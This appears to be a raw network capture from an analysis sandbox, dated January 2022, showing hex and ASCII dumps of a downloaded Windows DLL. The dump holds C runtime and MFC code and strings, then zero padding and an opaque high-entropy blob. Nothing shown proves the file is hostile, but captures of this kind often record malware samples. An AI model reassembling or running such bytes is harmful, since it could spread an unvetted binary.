                                                                                                                                  2022-01-28 20:04:54 UTC203INData Raw: 45 1c 3b c3 59 59 89 7e 54 75 03 8d 45 10 50 ff 75 18 56 68 09 2a 03 10 ff 75 0c ff 75 08 ff 15 e0 60 04 10 3b c3 75 20 ff 15 60 62 04 10 89 45 fc 56 e8 48 cf ff ff 39 5d fc 59 74 09 ff 75 fc e8 eb e6 ff ff 59 33 c0 5e 5f 5b c9 c3 cc 68 60 04 03 10 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 cc 45 05 10 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 8b 44 24 04 85 c0 56 8b f1 c6 46 0c 00 75 63 e8 47 27 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b 0e 3b 0d 20 53 05 10 74 12 8b 0d 3c 52 05 10 85 48 70 75 07 e8 89 80 00 00 89 06 8b 46 04 3b 05 40 51 05 10 74 16 8b 46 08 8b 0d 3c 52 05 10 85 48 70 75 08 e8
                                                                                                                                  Data Ascii: E;YY~TuEPuVh*uu`;u `bEVH9]YtuY3^_[h`d5D$l$l$+SVWE1E3PeuEEEEdMdY__^[]QD$VFucG'FHlHhN; St<RHpuF;@QtF<RHpu
                                                                                                                                  2022-01-28 20:04:54 UTC211INData Raw: f8 fb ff ff 83 c4 28 85 c0 74 07 56 50 e8 5b a9 ff ff 5d c3 55 8b ec 51 51 56 8b 75 08 81 3e 03 00 00 80 0f 84 da 00 00 00 57 e8 d3 07 00 00 83 b8 80 00 00 00 00 74 3f e8 c5 07 00 00 8d b8 80 00 00 00 e8 73 05 00 00 39 07 74 2b 81 3e 4d 4f 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 56 e8 f0 a9 ff ff 83 c4 1c 85 c0 0f 85 8b 00 00 00 8b 7d 18 83 7f 0c 00 75 05 e8 ef 0a 00 00 8b 75 1c 8d 45 f8 50 8d 45 fc 50 56 ff 75 20 57 e8 34 ab ff ff 8b f8 8b 45 fc 83 c4 14 3b 45 f8 73 5b 53 3b 37 7c 47 3b 77 04 7f 42 8b 47 0c 8b 4f 10 c1 e0 04 03 c1 8b 48 f4 85 c9 74 06 80 79 08 00 75 2a 8d 58 f0 f6 03 40 75 22 ff 75 24 8b 75 0c ff 75 20 6a 00 ff 75 18 ff 75 14 ff 75 10 ff 75 08 e8 bb fe ff ff 8b 75 1c 83 c4 1c ff 45 fc 8b 45 fc 83 c7 14 3b 45 f8
                                                                                                                                  Data Ascii: (tVP[]UQQVu>Wt?s9t+>MOCt#u$u uuuuV}uuEPEPVu W4E;Es[S;7|G;wBGOHtyu*X@u"u$uu juuuuuEE;E
                                                                                                                                  2022-01-28 20:04:54 UTC218INData Raw: 00 8d bf 80 00 00 00 49 75 a3 8b 75 f8 8b 7d fc 8b e5 5d c3 55 8b ec 83 ec 1c 89 7d f4 89 75 f8 89 5d fc 8b 5d 0c 8b c3 99 8b c8 8b 45 08 33 ca 2b ca 83 e1 0f 33 ca 2b ca 99 8b f8 33 fa 2b fa 83 e7 0f 33 fa 2b fa 8b d1 0b d7 75 4a 8b 75 10 8b ce 83 e1 7f 89 4d e8 3b f1 74 13 2b f1 56 53 50 e8 27 ff ff ff 83 c4 0c 8b 45 08 8b 4d e8 85 c9 74 77 8b 5d 10 8b 55 0c 03 d3 2b d1 89 55 ec 03 d8 2b d9 89 5d f0 8b 75 ec 8b 7d f0 8b 4d e8 f3 a4 8b 45 08 eb 53 3b cf 75 35 f7 d9 83 c1 10 89 4d e4 8b 75 0c 8b 7d 08 8b 4d e4 f3 a4 8b 4d 08 03 4d e4 8b 55 0c 03 55 e4 8b 45 10 2b 45 e4 50 52 51 e8 4c ff ff ff 83 c4 0c 8b 45 08 eb 1a 8b 75 0c 8b 7d 08 8b 4d 10 8b d1 c1 e9 02 f3 a5 8b ca 83 e1 03 f3 a4 8b 45 08 8b 5d fc 8b 75 f8 8b 7d f4 8b e5 5d c3 83 25 44 95 05 10 00 e8
                                                                                                                                  Data Ascii: Iuu}]U}u]]E3+3+3+3+uJuM;t+VSP'EMtw]U+U+]u}MES;u5Mu}MMMUUE+EPRQLEu}ME]u}]%D
                                                                                                                                  2022-01-28 20:04:54 UTC226INData Raw: f8 83 ff ff 74 43 85 ff 74 3f 57 ff 15 10 61 04 10 85 c0 74 34 89 3e 25 ff 00 00 00 83 f8 02 75 06 80 4e 04 40 eb 09 83 f8 03 75 04 80 4e 04 08 68 a0 0f 00 00 8d 46 0c 50 e8 b0 09 00 00 59 59 85 c0 74 37 ff 46 08 eb 0a 80 4e 04 40 c7 06 fe ff ff ff 43 83 fb 03 0f 8c 67 ff ff ff ff 35 0c 84 05 10 ff 15 c4 62 04 10 33 c0 eb 11 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff 83 c8 ff e8 90 a1 ff ff c3 56 57 be 20 84 05 10 8b 3e 85 ff 74 31 8d 87 00 05 00 00 eb 1a 83 7f 08 00 74 0a 8d 47 0c 50 ff 15 b0 61 04 10 8b 06 83 c7 28 05 00 05 00 00 3b f8 72 e2 ff 36 e8 41 70 ff ff 83 26 00 59 83 c6 04 81 fe 20 85 05 10 7c be 5f 5e c3 53 33 db 39 1d 74 95 05 10 56 57 75 05 e8 5c 1f 00 00 8b 35 cc 78 05 10 33 ff 3b f3 75 18 83 c8 ff e9 9b 00 00 00 3c 3d 74 01 47 56 e8 f5 76
                                                                                                                                  Data Ascii: tCt?Wat4>%uN@uNhFPYYt7FN@Cg5b33@eEVW >t1tGPa(;r6Ap&Y |_^S39tVWu\5x3;u<=tGVv
                                                                                                                                  2022-01-28 20:04:54 UTC234INData Raw: 10 ab ab ab eb b2 39 35 2c 82 05 10 0f 85 90 fe ff ff 83 c8 ff 8b 4d fc 5f 5e 33 cd 5b e8 12 50 ff ff c9 c3 6a 14 68 88 0d 05 10 e8 1e 83 ff ff 83 4d e0 ff e8 c9 aa ff ff 8b f8 89 7d dc e8 18 fd ff ff 8b 5f 68 8b 75 08 e8 b1 fd ff ff 89 45 08 3b 43 04 0f 84 57 01 00 00 68 20 02 00 00 e8 b2 af ff ff 59 8b d8 85 db 0f 84 46 01 00 00 b9 88 00 00 00 8b 77 68 8b fb f3 a5 83 23 00 53 ff 75 08 e8 f2 fd ff ff 59 59 89 45 e0 85 c0 0f 85 fc 00 00 00 8b 75 dc ff 76 68 ff 15 e8 61 04 10 85 c0 75 11 8b 46 68 3d 18 4d 05 10 74 07 50 e8 cb 51 ff ff 59 89 5e 68 53 8b 3d a8 61 04 10 ff d7 f6 46 70 02 0f 85 ea 00 00 00 f6 05 3c 52 05 10 01 0f 85 dd 00 00 00 6a 0d e8 d0 b1 ff ff 59 83 65 fc 00 8b 43 04 a3 3c 82 05 10 8b 43 08 a3 40 82 05 10 8b 43 0c a3 44 82 05 10 33 c0 89
                                                                                                                                  Data Ascii: 95,M_^3[PjhM}_huE;CWh YFwh#SuYYEuvhauFh=MtPQY^hS=aFp<RjYeC<C@CD3
                                                                                                                                  2022-01-28 20:04:54 UTC242INData Raw: 7e 44 8b c6 e8 59 f9 ff ff 8b 45 f0 8b 80 bc 00 00 00 8b 00 8a 00 88 06 8b 5b 04 46 85 db 7d 26 f7 db 80 7d 10 00 75 05 39 5d 0c 7c 03 89 5d 0c 8b 7d 0c 8b c6 e8 28 f9 ff ff 57 6a 30 56 e8 03 38 ff ff 83 c4 0c 80 7d fc 00 74 07 8b 45 f8 83 60 70 fd 33 c0 5f 5e 5b c9 c3 55 8b ec 83 ec 2c a1 cc 45 05 10 33 c5 89 45 fc 8b 45 08 53 56 57 8b 7d 0c 6a 16 5e 56 8d 4d e4 51 8d 4d d4 51 ff 70 04 ff 30 e8 f8 32 00 00 33 db 83 c4 14 3b fb 75 18 e8 73 49 ff ff 53 53 53 53 53 89 30 e8 c6 ae ff ff 83 c4 14 8b c6 eb 5a 8b 45 10 3b c3 76 e1 83 f8 ff 75 04 0b c0 eb 0b 33 c9 83 7d d4 2d 0f 94 c1 2b c1 8b 75 14 8d 4d d4 51 8b 4d d8 03 ce 51 50 33 c0 83 7d d4 2d 0f 94 c0 03 c7 50 e8 25 31 00 00 83 c4 10 3b c3 74 04 88 1f eb 15 ff 75 18 8d 45 d4 53 56 ff 75 10 8b cf e8 64 fe
                                                                                                                                  Data Ascii: ~DYE[F}&}u9]|]}(Wj0V8}tE`p3_^[U,E3EESVW}j^VMQMQp023;usISSSSS0ZE;vu3}-+uMQMQP3}-P%1;tuESVud
                                                                                                                                  2022-01-28 20:04:54 UTC250INData Raw: 14 e9 d5 04 00 00 f6 40 04 20 74 0f 6a 02 6a 00 6a 00 56 e8 81 fd ff ff 83 c4 10 56 e8 af f6 ff ff 85 c0 59 0f 84 f6 01 00 00 8b 07 f6 44 03 04 80 0f 84 e9 01 00 00 e8 46 6c ff ff 8b 40 6c 33 c9 39 48 14 8d 45 84 0f 94 c1 50 8b 07 ff 34 03 8b f1 ff 15 44 61 04 10 85 c0 0f 84 c0 01 00 00 85 f6 74 0a 80 7d ab 00 0f 84 b2 01 00 00 ff 15 40 61 04 10 83 65 b0 00 83 bd 28 05 00 00 00 8b 75 9c 89 45 84 89 75 8c 0f 86 ff 03 00 00 83 65 a4 00 eb 03 8b 75 8c 8a 45 ab 84 c0 0f 85 06 01 00 00 8a 06 33 c9 3c 0a 0f 94 c1 0f be c0 50 89 4d 88 e8 54 f8 ff ff 85 c0 59 75 1a 6a 01 8d 45 ac 56 50 e8 42 fb ff ff 83 c4 0c 83 f8 ff 0f 84 af 03 00 00 eb 30 8b 45 9c 2b c6 03 85 28 05 00 00 83 f8 01 0f 86 99 03 00 00 6a 02 8d 45 ac 56 50 e8 14 fb ff ff 83 c4 0c 83 f8 ff 0f 84 81
                                                                                                                                  Data Ascii: @ tjjjVVYDFl@l39HEP4Dat}@ae(uEueuE3<PMTYujEVPB0E+(jEVP
                                                                                                                                  2022-01-28 20:04:54 UTC258INData Raw: 74 b9 c6 07 0d 8b 03 8a 4d ff 88 4c 06 05 eb 25 3b 7d f4 75 06 80 7d ff 0a 74 a0 6a 01 6a ff 6a ff ff 75 08 e8 70 dd ff ff 83 c4 10 80 7d ff 0a 74 04 c6 07 0d 47 8b 45 f0 39 45 10 0f 82 47 ff ff ff eb 15 8b 03 8d 44 06 04 f6 00 40 75 05 80 08 02 eb 05 8a 01 88 07 47 8b c7 2b 45 f4 80 7d fe 01 89 45 f0 0f 85 d0 00 00 00 85 c0 0f 84 c8 00 00 00 4f 8a 0f 84 c9 78 06 47 e9 86 00 00 00 33 c0 40 0f b6 c9 eb 0f 83 f8 04 7f 13 3b 7d f4 72 0e 4f 0f b6 0f 40 80 b9 88 55 05 10 00 74 e8 8a 17 0f b6 ca 0f be 89 88 55 05 10 85 c9 75 0d e8 d5 0a ff ff c7 00 2a 00 00 00 eb 7a 41 3b c8 75 04 03 f8 eb 40 8b 0b 03 ce f6 41 04 48 74 24 47 83 f8 02 88 51 05 7c 09 8a 17 8b 0b 88 54 0e 25 47 83 f8 03 75 09 8a 17 8b 0b 88 54 0e 26 47 2b f8 eb 12 f7 d8 99 6a 01 52 50 ff 75 08 e8
                                                                                                                                  Data Ascii: tML%;}u}tjjjup}tGE9EGD@uG+E}EOxG3@;}rO@UtUu*zA;u@AHt$GQ|T%GuT&G+jRPu
                                                                                                                                  2022-01-28 20:04:54 UTC265INData Raw: 4b 3b d9 73 f6 3b d9 8b 45 a0 73 cd 66 83 20 00 66 81 7d 94 00 80 c6 40 03 01 0f 95 c2 fe ca 80 e2 0d 80 c2 20 88 50 02 c6 01 30 c6 40 05 00 e9 e7 f7 ff ff 33 c0 f6 c3 10 74 01 40 f6 c3 08 74 03 83 c8 04 f6 c3 04 74 03 83 c8 08 f6 c3 02 74 03 83 c8 10 f6 c3 01 74 03 83 c8 20 f7 c3 00 00 08 00 74 03 83 c8 02 8b cb ba 00 03 00 00 23 ca 56 be 00 02 00 00 74 23 81 f9 00 01 00 00 74 16 3b ce 74 0b 3b ca 75 13 0d 00 0c 00 00 eb 0c 0d 00 08 00 00 eb 05 0d 00 04 00 00 8b cb 81 e1 00 00 03 00 74 0c 81 f9 00 00 01 00 75 06 0b c6 eb 02 0b c2 f7 c3 00 00 04 00 5e 74 05 0d 00 10 00 00 c3 33 c0 f6 c2 10 74 05 b8 80 00 00 00 f6 c2 08 53 56 57 bb 00 02 00 00 74 02 0b c3 f6 c2 04 74 05 0d 00 04 00 00 f6 c2 02 74 05 0d 00 08 00 00 f6 c2 01 74 05 0d 00 10 00 00 f7 c2 00 00
                                                                                                                                  Data Ascii: K;s;Esf f}@ P0@3t@tttt t#Vt#t;t;utu^t3tSVWtttt
                                                                                                                                  2022-01-28 20:04:54 UTC273INData Raw: f0 e8 a4 4f fd ff 59 59 c3 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 1a b3 fe ff b8 a0 f3 04 10 e9 d2 af fe ff 8b 4d f0 83 c1 04 e9 fa 7f fe ff 8b 4d f0 83 c1 1c e9 b5 6d fe ff 8b 4d f0 83 c1 38 e9 aa 6d fe ff 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 de b2 fe ff b8 dc f3 04 10 e9 96 af fe ff 8b 54 24 08 8d 42 0c 8b 4a e8 33 c8 e8 c3 b2 fe ff b8 34 f4 04 10 e9 7b af fe ff 8b 4d e8 83 c1 0c e9 10 cd fb ff 8d 4d ec e9 08 cd fb ff 8b 54 24 08 8d 42 0c 8b 4a e0 33 c8 e8 95 b2 fe ff 8b 8a 0c 02 00 00 33 c8 e8 88 b2 fe ff b8 9c f4 04 10 e9 40 af fe ff 8d 4d f0 e9 d8 cc fb ff 8b 54 24 08 8d 42 0c 8b 4a dc 33 c8 e8 65 b2 fe ff 8b 8a 4c 01 00 00 33 c8 e8 58 b2 fe ff b8 c8 f4 04 10 e9 10 af fe ff 8b 4d f0 83 c1 10 e9 a5 cc fb ff 8b 54 24 08 8d 42 0c 8b 4a ec 33 c8 e8 32
                                                                                                                                  Data Ascii: OYYT$BJ3MMmM8mT$BJ3T$BJ34{MMT$BJ33@MT$BJ3eL3XMT$BJ32
                                                                                                                                  2022-01-28 20:04:54 UTC281INData Raw: 05 00 3a 26 05 00 24 26 05 00 18 26 05 00 00 26 05 00 f0 25 05 00 e0 25 05 00 d4 25 05 00 c8 25 05 00 ba 25 05 00 ae 25 05 00 96 25 05 00 84 25 05 00 6e 25 05 00 a8 27 05 00 5e 25 05 00 48 25 05 00 36 25 05 00 26 25 05 00 14 25 05 00 fe 24 05 00 ee 24 05 00 e4 24 05 00 d6 24 05 00 c6 24 05 00 b2 24 05 00 a0 24 05 00 8e 24 05 00 7e 24 05 00 6c 24 05 00 5e 24 05 00 48 24 05 00 3c 24 05 00 30 24 05 00 20 24 05 00 0e 24 05 00 fc 23 05 00 ee 23 05 00 de 23 05 00 c6 23 05 00 b0 23 05 00 a0 23 05 00 94 23 05 00 8c 23 05 00 80 23 05 00 1c 20 05 00 2e 20 05 00 40 20 05 00 54 20 05 00 60 20 05 00 6e 20 05 00 74 23 05 00 5a 23 05 00 4a 23 05 00 3a 23 05 00 26 23 05 00 14 23 05 00 f6 22 05 00 e6 22 05 00 da 22 05 00 cc 22 05 00 b8 22 05 00 ac 22 05 00 90 22 05 00 96
                                                                                                                                  Data Ascii: :&$&&&%%%%%%%%n%'^%H%6%&%%$$$$$$$$~$l$^$H$<$0$ $$######### . @ T ` n t#Z#J#:#&##"""""""
                                                                                                                                  2022-01-28 20:04:54 UTC289INData Raw: 04 10 10 00 00 00 ff ff 00 00 b5 ed 01 10 d8 88 04 10 00 00 00 00 00 00 00 00 fc 82 04 10 14 00 00 00 ff ff 00 00 00 00 00 00 68 83 04 10 00 00 00 00 00 00 00 00 f0 82 04 10 14 00 00 00 ff ff 00 00 00 00 00 00 68 83 04 10 00 00 00 00 00 00 00 00 e4 82 04 10 54 00 00 00 ff ff 00 00 00 00 00 00 68 83 04 10 00 00 00 00 00 00 00 00 d8 82 04 10 08 00 00 00 ff ff 00 00 d6 ed 01 10 d8 88 04 10 00 00 00 00 00 00 00 00 d0 82 04 10 08 00 00 00 ff ff 00 00 00 00 00 00 d8 83 04 10 00 00 00 00 00 00 00 00 c8 82 04 10 08 00 00 00 ff ff 00 00 00 00 00 00 d8 83 04 10 00 00 00 00 00 00 00 00 1c c9 04 10 45 e9 01 10 21 ee 01 10 80 35 01 10 0b 01 02 10 21 02 02 10 10 01 02 10 e4 c9 04 10 4b e9 01 10 3e ee 01 10 80 35 01 10 0b 01 02 10 21 02 02 10 10 01 02 10 00 00 00 00 38
                                                                                                                                  Data Ascii: hhThE!5!K>5!8
                                                                                                                                  2022-01-28 20:04:54 UTC297INData Raw: 6d 65 20 4c 69 62 72 61 72 79 00 00 00 00 0a 0a 00 00 2e 2e 2e 00 3c 70 72 6f 67 72 61 6d 20 6e 61 6d 65 20 75 6e 6b 6e 6f 77 6e 3e 00 00 52 75 6e 74 69 6d 65 20 45 72 72 6f 72 21 0a 0a 50 72 6f 67 72 61 6d 3a 20 00 00 00 28 00 6e 00 75 00 6c 00 6c 00 29 00 00 00 00 00 28 6e 75 6c 6c 29 00 00 00 00 00 00 06 00 00 06 00 01 00 00 10 00 03 06 00 06 02 10 04 45 45 45 05 05 05 05 05 35 30 00 50 00 00 00 00 28 20 38 50 58 07 08 00 37 30 30 57 50 07 00 00 20 20 08 00 00 00 00 08 60 68 60 60 60 60 00 00 78 70 78 78 78 78 08 07 08 00 00 07 00 08 08 08 00 00 08 00 08 00 07 08 00 00 00 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 41 6e 64 53 70 69 6e 43 6f 75 6e 74 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11
                                                                                                                                  Data Ascii: me Library...<program name unknown>Runtime Error!Program: (null)(null)EEE50P( 8PX700WP `h````xpxxxxInitializeCriticalSectionAndSpinCount
                                                                                                                                  2022-01-28 20:04:54 UTC305INData Raw: 04 10 00 00 00 00 90 32 05 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 d8 c1 04 10 00 00 00 00 00 00 00 00 00 00 00 00 b4 32 05 10 20 c2 04 10 00 00 00 00 00 00 00 00 02 00 00 00 30 c2 04 10 3c c2 04 10 e4 be 04 10 00 00 00 00 b4 32 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 c2 04 10 00 00 00 00 00 00 00 00 00 00 00 00 e8 32 05 10 6c c2 04 10 00 00 00 00 00 00 00 00 02 00 00 00 7c c2 04 10 88 c2 04 10 f0 c1 04 10 00 00 00 00 e8 32 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 6c c2 04 10 00 00 00 00 00 00 00 00 00 00 00 00 10 33 05 10 b8 c2 04 10 00 00 00 00 00 00 00 00 02 00 00 00 c8 c2 04 10 d4 c2 04 10 f0 c2 04 10 00 00 00 00 10 33 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40
                                                                                                                                  Data Ascii: 2@2 0<2@ 2l|2@l33@
                                                                                                                                  2022-01-28 20:04:54 UTC312INData Raw: 00 00 20 45 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 50 e0 04 10 00 00 00 00 00 00 00 00 00 00 00 00 54 45 05 10 9c e0 04 10 00 00 00 00 00 00 00 00 02 00 00 00 ac e0 04 10 b8 e0 04 10 f0 c2 04 10 00 00 00 00 54 45 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 9c e0 04 10 00 00 00 00 00 00 00 00 00 00 00 00 74 45 05 10 e8 e0 04 10 00 00 00 00 00 00 00 00 07 00 00 00 f8 e0 04 10 18 e1 04 10 34 e1 04 10 88 dd 04 10 70 bf 04 10 b0 bf 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 74 45 05 10 06 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 e8 e0 04 10 94 45 05 10 05 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 50 e1 04 10 00 00 00 00 00 00 00 00 06 00 00 00 60 e1 04 10 34 e1 04 10 88 dd 04 10 70
                                                                                                                                  Data Ascii: E@PTETE@tE4ptE@E@P`4p
                                                                                                                                  2022-01-28 20:04:54 UTC320INData Raw: 00 00 42 4b 04 10 ff ff ff ff 4a 4b 04 10 22 05 93 19 03 00 00 00 60 00 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 6d 4b 04 10 00 00 00 00 75 4b 04 10 22 05 93 19 02 00 00 00 9c 00 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 9e 4b 04 10 22 05 93 19 01 00 00 00 d0 00 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff c3 4b 04 10 22 05 93 19 01 00 00 00 fc 00 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 22 05 93 19 12 00 00 00 4c 01 05 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff e9 4b 04 10 00 00 00 00 2c 4c 04 10 00 00 00 00 42 4c 04 10 02 00 00 00 4a
                                                                                                                                  Data Ascii: BKJK"`mKuK"K"K""LK,LBLJ
                                                                                                                                  2022-01-28 20:04:54 UTC328INData Raw: 6e 67 73 57 00 00 a3 02 51 75 65 72 79 50 65 72 66 6f 72 6d 61 6e 63 65 43 6f 75 6e 74 65 72 00 ca 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 41 73 46 69 6c 65 54 69 6d 65 00 fd 00 47 65 74 41 43 50 00 00 ba 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 41 00 00 bd 01 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 e2 01 47 65 74 54 69 6d 65 5a 6f 6e 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 00 00 22 01 47 65 74 43 6f 6e 73 6f 6c 65 43 50 00 00 33 01 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 44 02 4c 43 4d 61 70 53 74 72 69 6e 67 41 00 00 45 02 4c 43 4d 61 70 53 74 72 69 6e 67 57 00 00 37 03 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 99 03 57 72 69 74 65 43 6f 6e 73 6f 6c 65 41 00 35 01 47 65 74 43 6f 6e 73 6f 6c 65 4f 75 74 70 75 74 43 50 00 00 a3 03 57 72 69
                                                                                                                                  Data Ascii: ngsWQueryPerformanceCounterGetSystemTimeAsFileTimeGetACPGetStringTypeAGetStringTypeWGetTimeZoneInformation"GetConsoleCP3GetConsoleModeDLCMapStringAELCMapStringW7SetStdHandleWriteConsoleA5GetConsoleOutputCPWri
                                                                                                                                  2022-01-28 20:04:55 UTC336INData Raw: 69 65 6e 74 53 69 74 65 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4f 6c 65 43 6c 69 65 6e 74 53 69 74 65 40 40 00 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 41 6d 62 69 65 6e 74 50 72 6f 70 73 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 50 72 6f 70 65 72 74 79 4e 6f 74 69 66 79 53 69 6e 6b 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 50 72 6f 70
                                                                                                                                  Data Ascii: ientSite@COleControlSite@@.?AUIOleClientSite@@.?AVXOleControlSite@COleControlSite@@.?AUIOleControlSite@@.?AVXAmbientProps@COleControlSite@@.?AVXPropertyNotifySink@COleControlSite@@.?AUIProp
                                                                                                                                  2022-01-28 20:04:55 UTC343INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii:
                                                                                                                                  2022-01-28 20:04:55 UTC351INData Raw: a6 0c 0b b7 e9 83 4d ca e0 f2 a7 1a dc e4 c7 fe 1a d2 59 64 1f c2 a6 d7 b5 43 99 96 34 62 8b 14 5e 7a 9b e4 28 a4 f7 2d be bd 26 6b 45 a4 e8 c1 ef 8c 25 b3 66 4e 76 ed da 5d 5e 75 4a 26 f3 51 b4 ca d6 4d 5c d1 aa 1d 47 bb 1d 1a a5 12 3f 44 d4 e6 b5 ff d9 25 73 c7 df 92 22 1a ec 89 be b5 08 95 9c 62 49 50 d0 1e cb e6 75 97 2d 37 28 fa fa 6e 62 2f ed 14 0a b9 d9 95 cc 52 17 96 58 11 96 b7 d8 a7 89 6b 58 51 4b 5b 4a 13 f8 48 d2 c8 e7 4d f6 bd 9c a1 b8 69 40 46 2e 08 d1 9b 20 99 c2 b3 2d 20 80 30 22 d7 5f 20 12 26 4a 67 58 11 16 b6 dc b6 23 9d 92 00 5a 89 00 9d 78 b5 ba 0c 68 8a 20 14 47 93 53 8c 0d f8 19 b2 14 cb d9 c5 31 55 2c 4f 1c 81 8f d0 3a 9c c6 e5 f5 c7 a8 1c 7e e2 e0 90 cd 24 3f 28 e9 fc 74 f2 f2 6c 53 da ef 54 0b a6 93 60 77 f9 0e c0 3e 06 ba da 53
                                                                                                                                  Data Ascii: MYdC4b^z(-&kE%fNv]^uJ&QM\G?D%s"bIPu-7(nb/RXkXQK[JHMi@F. - 0"_ &JgX#Zxh GS1U,O:~$?(tlST`w>S
                                                                                                                                  2022-01-28 20:04:55 UTC359INData Raw: a9 f9 71 16 48 fa 4f 73 1b 6a 11 b9 fd 18 b7 5c 36 e0 6f 39 c7 ca 70 66 af eb 73 9b 90 39 90 56 67 01 ea 5e b9 3f 88 7e d1 27 0d 92 0f 75 e5 6b 9e 9b 7e 34 86 eb c0 de 48 74 83 8b 71 0d 0d 62 58 86 62 2b ef db 95 7b 09 e3 fc d7 8e 23 31 07 b7 a1 07 b4 4d 3e ee 52 71 f6 08 c1 f9 4c 40 d7 90 13 e9 d9 19 3b 7e 02 d7 db af 1d de ef 51 a6 8a 48 25 fd 05 ee 33 ec d4 13 d1 18 3c e2 e2 aa 13 57 4a 14 df 9b 4e fe 9a 3f 07 9b ac 8d 97 9a 3e 2d 99 4c 49 7a 43 ff 74 7d 8b 02 b1 ea af 73 fb 39 4e 30 05 cb 34 81 7f 4f 9f 76 18 ea 4f 41 39 fa 54 dc b4 cc fb f3 fc 77 f8 b1 70 a0 e9 7f de 68 d9 07 b6 69 b4 a1 a5 f7 05 4e 10 aa d8 8b 1a 01 3a 27 47 11 e4 e9 bb 55 f8 e7 58 d1 ae 58 68 51 ea 12 da 35 be d3 c5 22 f5 91 b2 64 e7 e1 fa b4 c1 1e 50 73 58 7c 78 48 38 8f 95 21 c6
                                                                                                                                  Data Ascii: qHOsj\6o9pfs9Vg^?~'uk~4HtqbXb+{#1M>RqL@;~QH%3<WJN?>-LIzCt}s9N04OvOA9TwphiN:'GUXXhQ5"dPsX|xH8!
